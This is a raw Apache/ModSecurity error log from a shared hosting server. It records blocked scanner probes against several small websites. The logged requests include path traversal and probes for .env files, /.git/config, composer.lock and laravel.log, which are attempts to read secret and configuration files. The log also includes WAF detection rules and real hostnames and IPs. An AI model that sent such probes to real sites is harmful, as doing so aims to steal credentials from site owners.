[Mon May 11 22:32:35.462867 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI84qFW67LJTsgN3jQOHAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:36.702690 2026] [security2:error] [pid 1601130:tid 1601158] [client 49.51.183.75:37356] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/"] [unique_id "agI85HEgAO_835W6c1mYcgAAAEg"]
[Mon May 11 22:34:11.009602 2026] [core:error] [pid 1605480:tid 1605537] [client 45.148.10.244:45264] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 22:34:11.043497 2026] [core:error] [pid 1601130:tid 1601159] [client 45.148.10.244:45224] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Mon May 11 22:34:11.088740 2026] [core:error] [pid 1606352:tid 1606423] [client 45.148.10.244:45194] AH10244: invalid URI path (/../.env)
[Mon May 11 22:34:23.413591 2026] [autoindex:error] [pid 1590352:tid 1590409] [client 167.99.76.73:63849] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/uploads/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 22:34:24.400776 2026] [autoindex:error] [pid 1601130:tid 1601153] [client 167.99.76.73:64520] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/uploads/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 22:34:26.232765 2026] [autoindex:error] [pid 1590352:tid 1590409] [client 167.99.76.73:63849] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 22:34:27.282833 2026] [autoindex:error] [pid 1601130:tid 1601153] [client 167.99.76.73:64520] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 22:34:51.638754 2026] [security2:error] [pid 1534836:tid 1534880] [client 43.157.180.116:54016] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/evaluation/"] [unique_id "agI9a9eaRXe5lR8y0ZO3gAAAAUk"]
[Mon May 11 22:35:06.613633 2026] [authz_core:error] [pid 1606352:tid 1606425] [client 40.77.167.28:54347] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/SimplePie/error_log
[Mon May 11 22:35:26.577063 2026] [:error] [pid 1534836:tid 1534890] [client 85.208.96.204:48672] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 22:35:47.759082 2026] [security2:error] [pid 1601130:tid 1601170] [client 43.156.109.53:57722] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/wp-content/uploads/2020/04/He"] [unique_id "agI9o3EgAO_835W6c1mZngAAAFQ"]
[Mon May 11 22:36:05.287759 2026] [security2:error] [pid 1590352:tid 1590410] [client 43.153.204.189:33594] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/accueil/feed/"] [unique_id "agI9ta1q0G_aXAqWauT-CwAAAJI"]
[Mon May 11 22:37:01.596370 2026] [security2:error] [pid 1534836:tid 1534890] [client 43.130.174.37:45524] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation/lodge-bali/"] [unique_id "agI97deaRXe5lR8y0ZO4ewAAAVM"]
[Mon May 11 22:39:07.926339 2026] [security2:error] [pid 1534836:tid 1534877] [client 54.91.164.107:39788] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "com.manhattan-studio.fr"] [uri "/.git/config"] [unique_id "agI-a9eaRXe5lR8y0ZO5MAAAAUY"]
[Mon May 11 22:39:07.926758 2026] [security2:error] [pid 1534836:tid 1534877] [client 54.91.164.107:39788] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "com.manhattan-studio.fr"] [uri "/.git/config"] [unique_id "agI-a9eaRXe5lR8y0ZO5MAAAAUY"]
[Mon May 11 22:39:07.934524 2026] [security2:error] [pid 1534836:tid 1534877] [client 54.91.164.107:39788] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "com.manhattan-studio.fr"] [uri "/.git/config"] [unique_id "agI-a9eaRXe5lR8y0ZO5MAAAAUY"]
[Mon May 11 22:39:09.574958 2026] [security2:error] [pid 1601130:tid 1601153] [client 43.135.183.82:42590] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-un-salarie/envie-de-savoir/"] [unique_id "agI-bXEgAO_835W6c1ma5QAAAEM"]
[Mon May 11 22:39:52.032088 2026] [security2:error] [pid 1590352:tid 1590393] [client 43.166.247.155:44048] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/association.html"] [unique_id "agI-mK1q0G_aXAqWauT_IgAAAIE"]
[Mon May 11 22:39:56.544857 2026] [ssl:error] [pid 1534836:tid 1534889] (EAI 2)Name or service not known: [client 34.175.236.222:43306] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 22:39:56.545140 2026] [ssl:error] [pid 1534836:tid 1534889] AH01941: stapling_renew_response: responder error
[Mon May 11 22:39:57.748054 2026] [security2:error] [pid 1534836:tid 1534889] [client 34.175.236.222:43306] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.git/config"] [unique_id "agI-ndeaRXe5lR8y0ZO5kQAAAVI"]
[Mon May 11 22:39:57.748310 2026] [security2:error] [pid 1534836:tid 1534889] [client 34.175.236.222:43306] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.git/config"] [unique_id "agI-ndeaRXe5lR8y0ZO5kQAAAVI"]
[Mon May 11 22:39:57.749122 2026] [security2:error] [pid 1534836:tid 1534889] [client 34.175.236.222:43306] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agI-ndeaRXe5lR8y0ZO5kQAAAVI"]
[Mon May 11 22:41:00.717521 2026] [security2:error] [pid 1601130:tid 1601155] [client 47.128.47.136:58126] ModSecurity: Warning. Matched phrase "/composer.lock" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.lock found within REQUEST_FILENAME: /composer.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/composer.lock"] [unique_id "agI-3HEgAO_835W6c1mbVwAAAEU"]
[Mon May 11 22:41:00.731675 2026] [security2:error] [pid 1601130:tid 1601155] [client 47.128.47.136:58126] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/composer.lock"] [unique_id "agI-3HEgAO_835W6c1mbVwAAAEU"]
[Mon May 11 22:41:00.831395 2026] [security2:error] [pid 1601130:tid 1601155] [client 47.128.47.136:58126] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agI-3HEgAO_835W6c1mbVwAAAEU"]
[Mon May 11 22:41:08.209789 2026] [security2:error] [pid 1534836:tid 1534891] [client 43.165.167.72:46426] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI-5NeaRXe5lR8y0ZO57QAAAVQ"]
[Mon May 11 22:41:35.083565 2026] [core:error] [pid 1588898:tid 1588914] [client 178.170.14.75:52050] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.toutvendre.fr
[Mon May 11 22:41:35.084180 2026] [core:error] [pid 1588898:tid 1588914] [client 178.170.14.75:52050] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.toutvendre.fr
[Mon May 11 22:41:39.182663 2026] [security2:error] [pid 1534836:tid 1534875] [client 88.151.32.80:34916] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/.env.development"] [unique_id "agI_A9eaRXe5lR8y0ZO6GgAAAUQ"]
[Mon May 11 22:41:39.182852 2026] [security2:error] [pid 1534836:tid 1534875] [client 88.151.32.80:34916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/.env.development"] [unique_id "agI_A9eaRXe5lR8y0ZO6GgAAAUQ"]
[Mon May 11 22:41:39.183566 2026] [security2:error] [pid 1601130:tid 1601158] [client 88.151.32.80:35000] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/api/.env"] [unique_id "agI_A3EgAO_835W6c1mbeAAAAEg"]
[Mon May 11 22:41:39.184029 2026] [security2:error] [pid 1601130:tid 1601158] [client 88.151.32.80:35000] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/api/.env"] [unique_id "agI_A3EgAO_835W6c1mbeAAAAEg"]
[Mon May 11 22:41:39.184285 2026] [security2:error] [pid 1601130:tid 1601158] [client 88.151.32.80:35000] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/api/.env"] [unique_id "agI_A3EgAO_835W6c1mbeAAAAEg"]
[Mon May 11 22:41:39.184691 2026] [security2:error] [pid 1601130:tid 1601155] [client 88.151.32.80:34846] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "moncampingcarenligne.com"] [uri "/storage/logs/laravel.log"] [unique_id "agI_A3EgAO_835W6c1mbeQAAAEU"]
[Mon May 11 22:41:39.185040 2026] [security2:error] [pid 1601130:tid 1601155] [client 88.151.32.80:34846] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/storage/logs/laravel.log"] [unique_id "agI_A3EgAO_835W6c1mbeQAAAEU"]
[Mon May 11 22:41:39.185279 2026] [security2:error] [pid 1601130:tid 1601155] [client 88.151.32.80:34846] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/storage/logs/laravel.log"] [unique_id "agI_A3EgAO_835W6c1mbeQAAAEU"]
[Mon May 11 22:41:39.185279 2026] [security2:error] [pid 1534836:tid 1534871] [client 88.151.32.80:34910] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/.env.local"] [unique_id "agI_A9eaRXe5lR8y0ZO6GwAAAUE"]
[Mon May 11 22:41:39.185463 2026] [security2:error] [pid 1534836:tid 1534871] [client 88.151.32.80:34910] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/.env.local"] [unique_id "agI_A9eaRXe5lR8y0ZO6GwAAAUE"]
[Mon May 11 22:41:39.184646 2026] [security2:error] [pid 1605480:tid 1605544] [client 88.151.32.80:34976] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/.env.test"] [unique_id "agI_Ax2Cvzd_nyNfUm8D2QAAARY"]
[Mon May 11 22:41:39.185579 2026] [security2:error] [pid 1590352:tid 1590411] [client 88.151.32.80:34822] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/.git/config"] [unique_id "agI_A61q0G_aXAqWauT_wwAAAJM"]
[Mon May 11 22:41:39.186722 2026] [security2:error] [pid 1590352:tid 1590411] [client 88.151.32.80:34822] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/.git/config"] [unique_id "agI_A61q0G_aXAqWauT_wwAAAJM"]
[Mon May 11 22:41:39.189045 2026] [security2:error] [pid 1605480:tid 1605544] [client 88.151.32.80:34976] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/.env.test"] [unique_id "agI_Ax2Cvzd_nyNfUm8D2QAAARY"]
